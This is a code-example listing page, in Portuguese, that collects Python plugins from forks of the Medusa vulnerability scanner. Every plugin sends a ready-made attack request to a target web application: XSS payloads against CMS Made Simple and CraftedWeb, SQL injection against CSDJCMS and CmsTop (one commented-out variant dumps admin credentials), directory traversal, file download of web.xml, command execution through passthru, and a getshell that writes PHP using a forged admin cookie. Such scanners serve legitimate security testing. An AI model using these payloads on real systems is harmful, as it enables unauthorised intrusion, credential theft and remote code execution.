Exemplos de ClassCongregation.UrlProcessing em Python

Exemplo n.º 1

Arquivo: CMSMSReflectiveCrossSiteScriptingVulnerability.py Projeto: zerolugithub/Medusa

def medusa(Url,RandomAgent,proxies=None,**kwargs):
    proxies=ClassCongregation.Proxies().result(proxies)
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        payload = "/cmsms2.2.7/admin/moduleinterface.php?mact=ModuleManager,m1_,moduledepends,0&__c=3da8342831010e889e2&m1_name=Adherents&m1_version=0.2.6<script>alert(cscanhyhm2n)</script>&m1_filename=Adherents-0.2.6.xml"
        payload_url = scheme + "://" + url +":"+ str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
        }
        resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False)
        con = resp.text
        code = resp.status_code
        if code== 200 and con.find('cscanhyhm2n') != -1 :
            Medusa = "{}存在CMSMS反射型跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
            _t=VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write()  # 传入url和扫描到的数据
            ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件，url为目标文件名统一传入，Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类

Exemplo n.º 2

Arquivo: CMSMSCrossSiteScriptingVulnerability.py Projeto: 5l1v3r1/Medusa-1

def medusa(Url,RandomAgent,Token,proxies=None):
    proxies=ClassCongregation.Proxies().result(proxies)
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        RD=ClassCongregation.randoms().result(20)
        payload = "/k/cms/cmsmadesimple/install/index.php?sessiontest=1"
        data = '''default_cms_lang='%3e"%3e%3cbody%2fonload%3dalert({})%3e&submit=Submit'''.format(RD)
        payload_url = scheme + "://" + url +":"+ str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        resp = requests.post(payload_url, data=data,headers=headers,proxies=proxies, timeout=6,  verify=False)
        con = resp.text
        code = resp.status_code
        if code== 200 and con.find(RD) != -1 :
            Medusa = "{}存在CMSMS跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
            _t=VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(_t.info, url,Token).Write()  # 传入url和扫描到的数据
            ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件，url为目标文件名统一传入，Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(url, _)  # 调用写入类传入URL和错误插件名

Exemplo n.º 3

def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        payload = "/cmsms2.2.7/admin/moduleinterface.php?mact=ModuleManager,m1_,moduledepends,0&__c=3da8342831010e889e2&m1_name=Adherents&m1_version=0.2.6<script>alert(cscanhyhm2n)</script>&m1_filename=Adherents-0.2.6.xml"
        payload_url = scheme + "://" + url + ":" + str(port) + payload

        resp = requests.get(payload_url,
                            headers=Headers,
                            timeout=6,
                            proxies=proxies,
                            verify=False)
        con = resp.text
        code = resp.status_code
        if code == 200 and con.find('cscanhyhm2n') != -1:
            Medusa = "{}存在CMSMS反射型跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, **kwargs).Write()  # 传入url和扫描到的数据
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  #写入文件，url为目标文件名统一传入，Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(
            "Plugin Name:" + _ + " || Target Url:" + url, e)  #调用写入类

Exemplo n.º 4

Arquivo: CMSMSCrossSiteScriptingVulnerability1.py Projeto: wcxxxxx/Medusa

def medusa(Url,RandomAgent,UnixTimestamp):
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        payload = "/k/cms/cmsmadesimple/install/index.php"
        data = '''docroot=$("%3cimg%2fsrc%3d'x'%2fonerror%3dalert(cscan-hyhmnn)%3e")&docpath=%2Fhome%2Fk%2Fpublic_html%2Fcms%2Fcmsmadesimple&querystr=page&frontendlang=en_US&umask=022&host=localhost&dbms=mysqli&database=cms&username=root&password=superpass&db_port=0&timezone=Europe%2FBerlin&prefix=cms_&createtables=1&email_accountinfo=0&adminemail=admin%40here.com&adminusername=admin&adminpassword=password&page=7&default_cms_lang=en_US'''
        payload_url = scheme + "://" + url +":"+ str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        s = requests.session()
        resp = s.post(payload_url, data=data,headers=headers, timeout=6,  verify=False)
        con = resp.text
        code = resp.status_code
        if code== 200 and con.find('''<a href="$("<img/src='x'/onerror=alert(cscan-hyhmnn)>''') != -1 :
            Medusa = "{}存在CMSMS跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
            _t=VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(_t.info, url,UnixTimestamp).Write()  # 传入url和扫描到的数据
            ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件，url为目标文件名统一传入，Medusa为结果
    except Exception:
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _)  # 调用写入类传入URL和错误插件名

Exemplo n.º 5

Arquivo: CMSMSStoredCrossSiteScriptingVulnerability.py Projeto: deepwebhacker/Medusa-1

def medusa(Url:str,Headers:dict,proxies:str=None,**kwargs)->None:
    proxies=ClassCongregation.Proxies().result(proxies)
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        RD=ClassCongregation.randoms().result(20)
        payload = "/cmsms2.2.7/admin/siteprefs.php"
        data = '''__c=3da8342831010e889e2&active_tab=general&editsiteprefs=true&submit=Submit&sitename=lnyas's+cmsms&frontendlang=&frontendwysiwyg=-1&metadata=<script>alert("{}")</script>&logintheme=OneEleven&defaultdateformat=1&thumbnail_width=96&thumbnail_height=96&search_module=Search'''
        payload_url = scheme + "://" + url +":"+ str(port) + payload

        resp = requests.post(payload_url, data=data,headers=Headers, proxies=proxies,timeout=6,  verify=False)
        con = resp.text
        code = resp.status_code
        if code== 200 and con.find(RD) != -1 :
            Medusa = "{}存在CMSMS存储型跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
            _t=VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write()  # 传入url和扫描到的数据
            ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件，url为目标文件名统一传入，Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类

Exemplo n.º 6

Arquivo: CMSMSDirectoryTraversalVulnerability.py Projeto: wcxxxxx/Medusa

def medusa(Url, RandomAgent, UnixTimestamp):
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        payload = "/lib/filemanager/imagemanager/images.php?deld=../../"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent':
            RandomAgent,
            'Content-Type':
            'application/x-www-form-urlencoded',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        s = requests.session()
        resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
        con = resp.text
        code = resp.status_code
        if code == 200 and con.find('404') == -1 and con.find(
                'Not Found') == -1 and con.find('未找到') == -1:
            Medusa = "{}存在CMSMS目录遍历漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, UnixTimestamp).Write()  # 传入url和扫描到的数据
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  #写入文件，url为目标文件名统一传入，Medusa为结果
    except Exception:
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _)  # 调用写入类传入URL和错误插件名

Exemplo n.º 7

Arquivo: CraftedWebCrossSiteScriptingVulnerability.py Projeto: zerolugithub/Medusa

def medusa(Url,RandomAgent,proxies=None,**kwargs):
    proxies=ClassCongregation.Proxies().result(proxies)
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        RD=ClassCongregation.randoms().result(20)
        payload = "/aasp_includes/pages/notice.php?e=1<img src=x onerror=alert('{}')>".format(RD)
        payload_url = scheme + "://" + url +":"+ str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
        }

        resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False)
        con = resp.text
        code = resp.status_code
        if code== 200 and con.find('<script>alert({})</script>'.format(RD)) != -1 :
            Medusa = "{}存在CraftedWeb跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
            _t=VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write()  # 传入url和扫描到的数据
            ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件，url为目标文件名统一传入，Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类

Exemplo n.º 8

Arquivo: CSDJCMSSQLInjectionVulnerability.py Projeto: syadg123/Medusa-

def medusa(Url,RandomAgent,UnixTimestamp):
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        payload = "/index.php/dance/so/key/?key=%252527)%20%2561%256E%2564%201=2%20union%20%2573%2565%256C%2565%2563%2574%201,md5(4684894),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42%20%23"
        # 爆用户密码用
        # payload = "/index.php/dance/so/key/?key=%252527)%20%2561%256E%2564%201=2%20union%20%2573 \
        #                %2565%256C%2565%2563%2574%201,concat(CS_AdminName,0x3a,CS_AdminPass),3,4,5,6,\
        #                7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,\
        #                34,35,36,37,38,39,40,41,42%20from%20cscms_admin%23"
        payload_url = scheme + "://" + url +":"+ str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        s = requests.session()
        resp = s.get(payload_url,headers=headers, timeout=6, verify=False)
        con = resp.text
        if con.find("'904c23abadd5a4648a973c86385f3930'") != -1:
            Medusa = "{}存在CSDJCMSSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
            _t=VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(_t.info, url,UnixTimestamp).Write()  # 传入url和扫描到的数据
            ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件，url为目标文件名统一传入，Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(url, _)  # 调用写入类传入URL和错误插件名

Exemplo n.º 9

Arquivo: CyberwisdomArbitraryFileDownloadVulnerability2.py Projeto: 5up3rc/Medusa-1

def medusa(Url, RandomAgent, ProxyIp):
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        payload = "/fileServer/fileUpload/downloadFile.jsp?filePath=/WEB-INF/web.xml"
        payload_url = scheme + "//" + url + ":" + str(port) + payload
        headers = {
            'User-Agent':
            RandomAgent,
            'Content-Type':
            'application/x-www-form-urlencoded',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        s = requests.session()
        resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
        con = resp.text
        code = resp.status_code
        if code == 200 and con.find('xml version') != -1:
            Medusa = "{}存在汇思软件任意文件下载漏洞\r\n验证数据:\r\nUrl:{}\r\nPayload:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            web = ClassCongregation.VulnerabilityDetails(_t.info)
            web.High()
            return (str(_t.info))
    except Exception:
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _)  # 调用写入类传入URL和错误插件名

Exemplo n.º 10

def medusa(Url:str,Headers:dict,proxies:str=None,**kwargs)->None:
    proxies=ClassCongregation.Proxies().result(proxies)
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        payload = "/cms/cmsimple/admin/editusertag.php?_sk_=2a7da2216d41e0ac&userplugin_id=4"
        data = "_sk_=2a7da2216d41e0ac&userplugin_id=4&userplugin_name=aaa&code=passthru('dir')%3B&description=&run=1&apply=1&ajax=1"
        payload_url = scheme + "://" + url +":"+ str(port) + payload

        Headers["Accept"]="*/*"
        Headers["Content-Type"]="application/x-www-form-urlencoded; charset=UTF-8"
        Headers["X-Requested-With"]="XMLHttpRequest"
        Headers["Content-Length"]="115"
        Headers["Connection"]="close"
        Headers["Pragma"]="no-cache"
        Headers["Cache-Control"]="no-cache"

        resp = requests.post(payload_url, data=data, headers=Headers, proxies=proxies,timeout=6,  verify=False)
        con = resp.text
        code = resp.status_code
        if con.find('''{"response":"Success","details":"}''') != -1 :
            Medusa = "{}存在CMSMS任意命令执行漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
            _t=VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write()  # 传入url和扫描到的数据
            ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件，url为目标文件名统一传入，Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类

Exemplo n.º 11

Arquivo: CSDJCMSGetshell1.py Projeto: wcxxxxx/Medusa

def medusa(Url, RandomAgent, UnixTimestamp):
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        payload_url = scheme + "://" + url + ":" + str(port)
        referer = scheme + "://" + url
        headers = {
            "Host": "{}".format(url),
            "User-Agent": RandomAgent,
            "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Accept-Language": "zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3",
            "Accept-Encoding": "gzip, deflate",
            "Referer": "{}/admin/admin_t ... ;file=artindex.html".format(referer),
            "Cookie": "CS_AdminID=1; CS_AdminUserName=1; CS_AdminPassWord=1; CS_Quanx=0_1,1_1,1_2,1_3,1_4,1_5,2_1,2_2,2_3,2_4,2_5,2_6,2_7,3_1,3_2,3_3,3_4,4_1,4_2,4_3,4_4,4_5,4_6,4_7,5_1,5_2,5_3,5_4,5_5,6_1,6_2,6_3,7_1,7_2,8_1,8_2,8_3,8_4; CS_Login=a3f5f5a662e8a36525f4794856e2d0a2; PHPSESSID=48ogo025b66lkat9jtc8aecub1; CNZZDATA3755283=cnzz_eid%3D1523253931-1364956519-http%253A%252F%252Fwww.djkao.com%26ntime%3D1364956519%26cnzz_a%3D1%26retime%3D1365129491148%26sin%3D%26ltime%3D1365129491148%26rtime%3D0; bdshare_firstime=1365129335963",
            "Connection": "keep-alive",
            "Content-Type": "application/x-www-form-urlencoded",
            "Content-Length": "169"
        }
        data = "name=cs-bottom.php&content=%3C%3Fphp+phpinfo%28%29+%3F%3E"
        s = requests.session()
        resp = s.post(payload_url,data=data,headers=headers, timeout=6, verify=False)
        con = resp.text
        if con.find('PHP Version') != -1 and con.find('System'):
            Medusa = "{}存在CSDJCMSGetshell\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(_t.info, url,UnixTimestamp).Write()  # 传入url和扫描到的数据
            ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件，url为目标文件名统一传入，Medusa为结果
    except Exception:
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _)  # 调用写入类传入URL和错误插件名

Exemplo n.º 12

def medusa(Url, RandomAgent, ProxyIp):
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        payload = "/cacti.sql"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent':
            RandomAgent,
            'Content-Type':
            'application/x-www-form-urlencoded',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        s = requests.session()
        resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
        con = resp.text
        code = resp.status_code
        if code == 200 and con.find('cacti.sql') != -1:
            Medusa = "{}存在CactiSQL数据库文件泄露漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            web = ClassCongregation.VulnerabilityDetails(_t.info)
            web.High()  # serious表示严重，High表示高危，Intermediate表示中危，Low表示低危
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  #写入文件，url为目标文件名统一传入，Medusa为结果
    except Exception:
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _)  # 调用写入类传入URL和错误插件名

Exemplo n.º 13

Arquivo: CraftedWebCrossSiteScriptingVulnerability.py Projeto: syadg123/Medusa-

def medusa(Url, RandomAgent, UnixTimestamp):
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        payload = "/aasp_includes/pages/notice.php?e=1<img src=x onerror=alert('cscan')>"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent':
            RandomAgent,
            'Content-Type':
            'application/x-www-form-urlencoded',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        s = requests.session()
        resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
        con = resp.text
        code = resp.status_code
        if code == 200 and con.find('<script>alert(cscan)</script>') != -1:
            Medusa = "{}存在CraftedWeb跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, UnixTimestamp).Write()  # 传入url和扫描到的数据
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  #写入文件，url为目标文件名统一传入，Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(url, _)  # 调用写入类传入URL和错误插件名

Exemplo n.º 14

def medusa(Url,RandomAgent,proxies=None,**kwargs):
    proxies=ClassCongregation.Proxies().result(proxies)
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        RD=ClassCongregation.randoms().result(20)
        payload = "/cmsms2.2.7/admin/siteprefs.php"
        data = '''__c=3da8342831010e889e2&active_tab=general&editsiteprefs=true&submit=Submit&sitename=lnyas's+cmsms&frontendlang=&frontendwysiwyg=-1&metadata=<script>alert("{}")</script>&logintheme=OneEleven&defaultdateformat=1&thumbnail_width=96&thumbnail_height=96&search_module=Search'''
        payload_url = scheme + "://" + url +":"+ str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",

        }
        resp = requests.post(payload_url, data=data,headers=headers, proxies=proxies,timeout=6,  verify=False)
        con = resp.text
        code = resp.status_code
        if code== 200 and con.find(RD) != -1 :
            Medusa = "{}存在CMSMS存储型跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
            _t=VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write()  # 传入url和扫描到的数据
            ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件，url为目标文件名统一传入，Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类

Exemplo n.º 15

def medusa(Url, RandomAgent, ProxyIp):
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        payload = "/?app=vote&controller=vote&action=total&contentid=1 and 1=2 union select md5(c) from cmstop_admin where departmentid=2 limit 0,1;#"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent':
            RandomAgent,
            'Content-Type':
            'application/x-www-form-urlencoded',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        s = requests.session()
        resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
        con = resp.text
        code = resp.status_code
        if con.find('4a8a08f09d37b73795649038408b5f33') != -1:
            Medusa = "{}存在CmsTopSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            web = ClassCongregation.VulnerabilityDetails(_t.info)
            web.High()  # serious表示严重，High表示高危，Intermediate表示中危，Low表示低危
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  # 写入文件，url为目标文件名统一传入，Medusa为结果
    except Exception:
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _)  # 调用写入类传入URL和错误插件名

Exemplo n.º 16

def medusa(Url,RandomAgent,UnixTimestamp):
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        payload = "/index.php/open/bang"
        payload_url = scheme + "://" + url +":"+ str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        data = "openid=x&denglu=login&username=a%27 and(select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1#&userpass=testvul"
        s = requests.session()
        resp = s.post(payload_url,headers=headers, data=data, timeout=6, verify=False)
        con = resp.text
        if con.find("for key 'group_key'") != -1:
            Medusa = "{}存在CSDJCMSSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
            _t=VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(_t.info, url,UnixTimestamp).Write()  # 传入url和扫描到的数据
            ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件，url为目标文件名统一传入，Medusa为结果
    except Exception:
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _)  # 调用写入类传入URL和错误插件名

Exemplo n.º 17

Arquivo: CSDJCMSSQLInjectionVulnerability1.py Projeto: thinks520/Medusa

def medusa(Url, RandomAgent, ProxyIp):
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        payload = "/index.php/dance/so/key/?key=%252527)%20%2561%256E%2564%201=2%20union%20%2573%2565%256C%2565%2563%2574%201,md5(3.1415),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42%23"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent':
            RandomAgent,
            'Content-Type':
            'application/x-www-form-urlencoded',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        s = requests.session()
        resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
        con = resp.text
        if con.find("63e1f04640e83605c1d177544a5a0488") != -1:
            Medusa = "{}存在CSDJCMSSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            web = ClassCongregation.VulnerabilityDetails(_t.info)
            web.High()  # serious表示严重，High表示高危，Intermediate表示中危，Low表示低危
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  #写入文件，url为目标文件名统一传入，Medusa为结果
    except Exception:
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _)  # 调用写入类传入URL和错误插件名

Exemplo n.º 18

def medusa(Url, RandomAgent, ProxyIp):
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        payload = "/cmsms2.2.7/admin/moduleinterface.php?mact=ModuleManager,m1_,moduledepends,0&__c=3da8342831010e889e2&m1_name=Adherents&m1_version=0.2.6<script>alert(cscanhyhm2n)</script>&m1_filename=Adherents-0.2.6.xml"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent':
            RandomAgent,
            'Content-Type':
            'application/x-www-form-urlencoded',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        s = requests.session()
        resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
        con = resp.text
        code = resp.status_code
        if code == 200 and con.find('cscanhyhm2n') != -1:
            Medusa = "{}存在CMSMS反射型跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            web = ClassCongregation.VulnerabilityDetails(_t.info)
            web.Low()  # serious表示严重，High表示高危，Intermediate表示中危，Low表示低危
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  #写入文件，url为目标文件名统一传入，Medusa为结果
    except Exception:
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _)  # 调用写入类传入URL和错误插件名

Exemplo n.º 19

